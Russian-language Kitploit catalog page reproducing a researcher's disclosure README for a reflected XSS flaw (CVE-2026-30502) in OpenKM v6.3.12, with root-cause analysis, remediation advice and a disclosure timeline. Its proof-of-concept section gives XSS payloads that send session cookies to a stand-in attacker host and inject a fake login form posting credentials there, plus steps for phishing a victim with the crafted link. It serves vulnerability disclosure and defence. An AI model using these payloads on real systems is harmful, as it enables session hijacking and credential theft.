Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Документация и proof-of-concept для CVE-2026-30502, отражённая XSS-уязвимость в OpenKM v6.3.12. Включает технический анализ, первопричину, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров. | Kitploit
Инструменты/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Инструменты фишингаАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Документация и proof-of-concept для CVE-2026-30502, отражённая XSS-уязвимость в OpenKM v6.3.12. Включает технический анализ, первопричину, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
123 месяцев назадЕщё не проверено

🛡️ CVE-2026-30502 — Отражённая XSS в OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Обнаружено и сообщено Dharmendra Kumar — Исследователь безопасности

Кибербезопасность | Тестирование на проникновение | Исследование уязвимостей | Ответственное раскрытие


📌 Содержание

  • Обзор
  • Детали CVE
  • Затронутый продукт
  • Описание уязвимости
  • Анализ первопричины
  • Воздействие и оценка рисков
  • Доказательство концепции (PoC)
  • Устранение и рекомендации
  • Хронология раскрытия
  • Ссылки
  • Об исследователе

🔍 Обзор

Этот репозиторий документирует ответственное раскрытие информации о CVE-2026-30502 — уязвимости Отражённая межсайтовая подмена сценариев (XSS), обнаруженной в OpenKM v6.3.12 — широко используемой системе управления документами с открытым исходным кодом, применяемой в корпоративной и государственной среде.

Уязвимость существует в параметре Content, который отражает вводимые пользователем данные обратно в браузер без надлежащей санитизации или кодирования вывода. Злоумышленник может создать вредоносную ссылку, содержащую встроенный JavaScript, и с помощью социальной инженерии заставить жертву перейти по ней, что приведёт к выполнению скрипта в сессии браузера жертвы.

⚠️ Серьёзность: Средняя–Высокая | Вектор атаки: Сеть | Требуемые привилегии: Нет | Взаимодействие с пользователем: Требуется


📋 Детали CVE


📦 Затронутый продукт

OpenKM — это бесплатная система управления документами с открытым исходным кодом (DMS), предоставляющая веб-интерфейс для управления, аудита и распространения бизнес-документов. Она используется предприятиями, государственными органами и образовательными учреждениями по всему миру.

  • Название продукта: OpenKM Document Management System
  • Затронутая версия: v6.3.12
  • Веб-сайт поставщика: https://www.openkm.com
  • Категория: Система управления документами (DMS)
  • Язык / Стек: Java (JSP / Spring Framework)

🧨 Описание уязвимости

Отражённая межсайтовая подмена сценариев (XSS) была обнаружена в OpenKM v6.3.12 через параметр Content. Приложение не проверяет и не кодирует вводимые пользователем данные перед их отражением в теле HTTP-ответа, что позволяет внедрить и выполнить произвольный JavaScript в браузере жертвы.

В отличие от хранимой XSS, полезная нагрузка отражённой XSS не сохраняется в базе данных — она переносится в сфабрикованной ссылке. Атака основана на том, что жертву обманом заставляют перейти по вредоносной ссылке (доставленной по электронной почте, через социальные сети или фишинговые кампании), после чего полезная нагрузка незаметно выполняется в её браузере в контексте сессии жертвы.

Поток атаки

root@kitploit:~
Злоумышленник создаёт вредоносную ссылку
        │
        ▼
Жертва переходит по ссылке (фишинг / социальная инженерия)
        │
        ▼
Браузер отправляет GET/POST-запрос с полезной нагрузкой в параметре `Content`
        │
        ▼
OpenKM отражает несанитизированные входные данные непосредственно в HTML-ответ
        │
        ▼
Браузер разбирает и выполняет внедрённый JavaScript
        │
        ▼
Угон сессии / кража учётных данных / компрометация учётной записи

🔬 Анализ первопричины

Уязвимость возникает из-за того, что приложение не применяет меры безопасности входных-выходных данных к параметру Content:

root@kitploit:~
Ссылка, созданная пользователем ──► Параметр Content ──► [НЕТ ПРОВЕРКИ]
       ──► Отражено в HTML-ответе ──► [НЕТ КОДИРОВАНИЯ]
              ──► Браузер выполняет скрипт ──► Компрометация учётной записи

💥 Воздействие и оценка рисков

Успешная эксплуатация этой уязвимости может привести к:


🧪 Доказательство концепции (PoC)

⚠️ Отказ от ответственности: Следующая информация предоставляется строго в образовательных целях и для исследований безопасности в соответствии с принципами ответственного раскрытия. Не тестируйте и не используйте это против систем, которые вам не принадлежат или на которые у вас нет явного письменного разрешения.

Примеры полезных нагрузок (общие)

root@kitploit:~
// Основное доказательство выполнения
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Извлечение cookie сессии
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Фишинговая накладка для учётных данных
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

Структура вредоносной ссылки

root@kitploit:~
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

Шаги для воспроизведения

  1. Определите уязвимую конечную точку в OpenKM v6.3.12, которая отражает параметр Content
  2. Сформируйте ссылку, добавив полезную нагрузку XSS к параметру Content
  3. При необходимости закодируйте полезную нагрузку в URL
  4. Отправьте сфабрикованную ссылку жертве по электронной почте, в чате или с помощью любого вектора социальной инженерии
  5. Когда жертва откроет ссылку в своём аутентифицированном браузере, полезная нагрузка выполнится
  6. Наблюдайте выполнение JavaScript, кражу cookie или перенаправление

🛠️ Устранение и рекомендации

Для разработчиков / поставщиков

Для системных администраторов

  • 🔒 Ограничить доступ к OpenKM внутренними/доверенными сетями с помощью правил брандмауэра
  • 🛡️ Развернуть веб-брандмауэр приложений (WAF) с сигнатурами обнаружения XSS в качестве компенсирующей меры
  • 📊 Мониторить журналы доступа веб-сервера на предмет неожиданных тегов скриптов или закодированных полезных нагрузок в строках запроса
  • 🔄 Поддерживать установку OpenKM обновлённой до последней безопасной версии
  • 📧 Обучить пользователей проявлять осторожность при переходе по непрошеным ссылкам на СУД

📅 Хронология раскрытия

На протяжении всего процесса соблюдались полные принципы ответственного раскрытия, включая координацию с поставщиком и взаимодействие с программой CVE до любого публичного выпуска.


📚 Ссылки

  • 🔗 Запись MITRE CVE — CVE-2026-30502
  • 🔗 NVD — Национальная база данных уязвимостей
  • 🔗 Официальный сайт OpenKM
  • 🔗 Шпаргалка OWASP по предотвращению XSS
  • 🔗 CWE-79: Межсайтовое выполнение сценариев
  • 🔗 OWASP Top 10 — A03:2021 Инъекции
  • 🔗 Кодировщик Java OWASP

👨‍💻 Об исследователе

Dharmendra Kumar

Исследователь безопасности | Тестировщик на проникновение | Охотник за багами | Участник программы CVE

Dharmendra Kumar — независимый исследователь кибербезопасности, специализирующийся на безопасности веб-приложений, тестировании на проникновение и ответственном раскрытии уязвимостей. Его исследования сосредоточены на выявлении и ответственном сообщении о реальных недостатках безопасности в широко используемом программном обеспечении, что способствует повышению безопасности приложений для пользователей по всему миру.

Области экспертизы:

  • 🌐 Тестирование на проникновение веб-приложений
  • 🐛 Охота за багами и исследование CVE
  • 🔍 Обнаружение уязвимостей и консультации по безопасности
  • 📋 Ответственное раскрытие и координированное сообщение о CVE

Свяжитесь со мной:

GitHub LinkedIn Twitter Instagram Medium


⚖️ Правовой отказ от ответственности

Этот репозиторий предназначен исключительно для образовательных и информационных целей. Детали уязвимости и полезные нагрузки доказательства концепции публикуются в соответствии с принципами ответственного раскрытия. Автор не одобряет и не несёт ответственности за любое несанкционированное использование этой информации. Всегда получайте явное письменное разрешение перед проведением тестирования безопасности любой системы, которая вам не принадлежит.


🙏 Благодарности

Особая благодарность:

  • Команде разработчиков OpenKM за сотрудничество и оперативность в ходе координированного раскрытия
  • Программе MITRE CVE за назначение и управление идентификатором CVE
  • Глобальному сообществу исследователей безопасности и программе вознаграждений за баги за постоянное повышение планки безопасности приложений

⭐ Если это исследование помогло вам, пожалуйста, поставьте звезду этому репозиторию.

Исследования безопасности, открыто опубликованные, чтобы сделать веб безопаснее для всех.

© 2026 Dharmendra Kumar — Все права защищены

Скачать инструмент
ПолеДетали
Идентификатор CVECVE-2026-30502
ПродуктOpenKM
Затронутая версияv6.3.12
Класс уязвимостиОтражённая межсайтовая подмена сценариев (XSS)
Уязвимый параметрContent
CWECWE-79: Некорректная нейтрализация входных данных во время генерации веб-страницы
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
СерьёзностьСредняя–Высокая
ИздательПрограмма MITRE CVE
ИсследовательDharmendra Kumar
Тип раскрытияОтветственное / Координированное
СлабостьОписание
❌ Отсутствует проверка вводаПараметр Content принимает необработанные символы HTML/JavaScript без ограничений или фильтрации
❌ Отсутствует кодирование выводаОтражённые значения записываются в HTML-ответ без кодирования HTML-сущностей
❌ Отсутствует заголовок CSPНе применяется политика безопасности содержимого для блокировки выполнения встроенных скриптов
❌ Нет файлов cookie с флагом HTTPOnlyТокены сессии доступны через JavaScript, что позволяет напрямую украсть cookie
РискОписание
🍪 Угон сессииКража активных токенов сессии через document.cookie для выдачи себя за жертву
🔑 Сбор учётных данныхВнедрение поддельных наложений входа для захвата незашифрованных имён пользователей и паролей
📤 Раскрытие информацииИзвлечение конфиденциального содержимого документов, данных пользователей или внутренних конфигураций
🎣 Фишинговые атакиПредоставление убедительных поддельных страниц, размещённых в доверенном домене OpenKM
👤 Захват учётной записиВыполнение произвольных аутентифицированных действий от имени жертвы
⚙️ Несанкционированные действияИзменение, удаление или извлечение документов в СУД
🖥️ Распространение вредоносного ПОПеренаправление жертв на сайты, контролируемые злоумышленником, размещающие вредоносные загрузки
РекомендацияРеализация
✅ Проверка вводаОтклонять или удалять специальные символы HTML (<, >, ", ', ;) из всех управляемых пользователем параметров
✅ Кодирование выводаПрименять контекстно-зависимое HTML-кодирование с использованием библиотек, таких как OWASP Java Encoder, перед отображением отражённых данных
✅ Политика безопасности содержимогоВнедрить строгий заголовок CSP: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ Файлы cookie с флагом HTTPOnlyУстановить флаги HttpOnly и Secure на всех файлах cookie сессии для блокировки доступа через JavaScript
✅ Библиотеки безопасностиИнтегрировать OWASP AntiSamy или DOMPurify для надёжной санитизации
✅ ОбновлениеНемедленно применить последний выпущенный поставщиком патч безопасности
ДатаСобытие
🔍 ОбнаружениеУязвимость выявлена во время оценки безопасности OpenKM v6.3.12
📧 Уведомление поставщикаОтчёт об ответственном раскрытии отправлен команде безопасности OpenKM
🤝 Подтверждение поставщикаКоманда OpenKM подтвердила получение отчёта об уязвимости
📝 Назначение CVECVE-2026-30502 присвоен через программу MITRE CVE
🌐 Публичное раскрытиеКоординированное публичное раскрытие после периода устранения